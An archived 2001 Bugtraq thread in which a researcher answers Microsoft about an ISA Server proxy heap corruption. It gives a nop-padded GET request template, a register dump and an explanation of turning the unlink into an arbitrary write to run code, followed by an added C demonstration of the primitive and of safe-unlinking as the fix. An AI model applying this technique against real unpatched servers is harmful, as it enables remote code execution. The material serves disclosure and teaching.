This was tested with the standard edition available on the Microsoft site.

Details -

04/27/2001  01:56a    369,936 W3PROXY.EXE

Request -

GET http://host/<2338 x nop><offset to user buffer><stored ret address>

We found we needed to send this request twice to reach the code location where we are able to execute our buffer. The heap corruption can lead to random crash locations, but we hit this point more often than not. The fact is, it is possible.

EAX=41414141 EBX=02492394 ECX=78787878 EDX=0105B9F8 ESI=0105B9F8 EDI=024A25F0
EBP=0621FE1C ESP=0621FDF8 EIP=0101D72F o d I s z A p c
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000
ds:41414141=FFFFFFFF
001b:0101d72f mov  [eax], ecx
001b:0101d731 mov  [ecx+04], eax
001b:0101d734 call [ntdll!RtlLeaveCriticalSection]
001b:0101d73a mov  eax, edi
001b:0101d73c pop  edi
001b:0101d73d pop  esi
001b:0101d73e ret
(PASSIVE)-KTEB(854083E0)-TID(05C4)--W3PROXY!.text+0001C741----------

As you can see we are able to define the values of ecx and eax... we can write whatever data we want to a location of our choosing. By overwriting eax with a saved return address and ecx with the address of our buffer we can execute our code.

We had a couple of inventive ways of getting the needed stack values. Overwriting string locations with the data and having the product output the values was one. A few possibilities.

Am I done?

dark spyrit.

----- Original Message -----
From: "Microsoft Security Response Center" <secureat_private>
To: <BUGTRAQat_private>
Sent: Saturday, April 28, 2001 2:54 AM
Subject: Re: Microsoft ISA Server Vulnerability

Hi -

You're right that the root problem here is a heap corruption. The Knowledge Base article we published on the subject (http://support.microsoft.com/support/kb/articles/q295/2/79.asp, "Cause") notes that this is the case. As part of our investigation, we examined whether the heap corruption could, in this case, be exploited to run code, but we were unable to find any way to do so.

If you can demonstrate an ability to run code via the exploit, please contact us immediately as we'd be most interested in investigating the issue further.

Regards,
Scott Culp
Security Program Manager
Microsoft Corporation
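Added example, written for this page and not taken from dark spyrit's post or from Microsoft: the two stores at 0101d72f and 0101d731 have the shape of a doubly-linked list unlink, with eax holding the node's back link and ecx its forward link (that reading is an assumption, not something the post states). The C program below reproduces the same two writes on a toy in-process list, shows how overwritten links turn the unlink into the "write whatever data we want to a location of our choosing" the post describes, and then shows the safe-unlinking consistency check (verify that both neighbours point back at the node before touching them) that later heap allocators adopted so that a corrupted node is refused rather than unlinked. All pointers are constructed in-process; nothing here touches a real heap.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Toy list entry. On 32-bit x86 the back link sits at +4, which is the
 * [ecx+04] seen in the dump; on a 64-bit host it is at +8, same logic. */
typedef struct entry {
    struct entry *flink;   /* forward link: the role ecx plays in the dump */
    struct entry *blink;   /* back link:    the role eax plays in the dump */
} entry_t;

/* Naive unlink: exactly the two writes in the disassembly.
 *   mov [eax], ecx     -> blink->flink = flink
 *   mov [ecx+04], eax  -> flink->blink = blink
 * If an overflow has replaced blink/flink with attacker-chosen values,
 * the first store is an arbitrary pointer-sized write: *blink = flink. */
static void unlink_naive(entry_t *node)
{
    entry_t *flink = node->flink;
    entry_t *blink = node->blink;
    blink->flink = flink;
    flink->blink = blink;
}

/* Safe unlink: before writing, verify the neighbours really point back at
 * this node. Links overwritten by a heap overflow almost never satisfy
 * both checks, so the unlink is refused instead of becoming a
 * write-what-where. Returns 1 on success, 0 when corruption is detected. */
static int unlink_safe(entry_t *node)
{
    entry_t *flink = node->flink;
    entry_t *blink = node->blink;
    if (flink == NULL || blink == NULL)
        return 0;
    if (flink->blink != node || blink->flink != node)
        return 0;                    /* list integrity violated: refuse */
    blink->flink = flink;
    flink->blink = blink;
    return 1;
}

/* Builds the circular list head <-> a <-> b <-> head. */
static void build_list(entry_t *head, entry_t *a, entry_t *b)
{
    head->flink = a;    a->blink = head;
    a->flink = b;       b->blink = a;
    b->flink = head;    head->blink = b;
}

/* Intact list: the safe unlink removes b and leaves head <-> a <-> head. */
int demo_intact_list(void)
{
    entry_t head, a, b;
    build_list(&head, &a, &b);
    if (!unlink_safe(&b))
        return 0;
    return head.flink == &a && a.flink == &head &&
           head.blink == &a && a.blink == &head;
}

/* Corrupted node, standing in for the post's overwritten eax/ecx.
 * ret_slot.flink plays the saved-return-address slot, payload_area the
 * attacker's buffer. The naive unlink writes &payload_area into the slot. */
int demo_naive_unlink_writes_target(void)
{
    entry_t ret_slot, payload_area, corrupted;
    memset(&ret_slot, 0, sizeof ret_slot);        /* constructed sentinel: NULL */
    memset(&payload_area, 0, sizeof payload_area);
    corrupted.blink = &ret_slot;                  /* "eax": where to write */
    corrupted.flink = &payload_area;              /* "ecx": what to write */
    unlink_naive(&corrupted);
    return ret_slot.flink == &payload_area;       /* slot now holds the buffer address */
}

/* Same corrupted node against the safe unlink: refused, slot untouched. */
int demo_safe_unlink_refuses(void)
{
    entry_t ret_slot, payload_area, corrupted;
    memset(&ret_slot, 0, sizeof ret_slot);
    memset(&payload_area, 0, sizeof payload_area);
    corrupted.blink = &ret_slot;
    corrupted.flink = &payload_area;
    int ok = unlink_safe(&corrupted);             /* payload_area.blink != &corrupted */
    return ok == 0 && ret_slot.flink == NULL;
}

int main(void)
{
    printf("intact list unlink ok:              %d\n", demo_intact_list());
    printf("naive unlink overwrote target slot: %d\n", demo_naive_unlink_writes_target());
    printf("safe unlink refused corrupted node: %d\n", demo_safe_unlink_refuses());
    return 0;
}
```

The check in unlink_safe is the same idea Microsoft later shipped as heap safe unlinking (and glibc as its "corrupted double-linked list" check): it costs two loads and two compares per unlink and turns the primitive shown in the register dump into a detectable abort. A crash in a list-manipulation routine with register values that look like request data, as in the dump above, is the signature defenders should treat as a probable exploitation attempt rather than a random fault.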
This archive was generated by hypermail 2b30 : Sat Apr 28 2001 - 10:13:15 PDT